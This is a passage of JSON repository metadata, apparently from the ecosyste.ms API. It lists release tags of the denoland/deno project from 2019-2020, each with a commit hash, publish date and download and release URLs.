name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/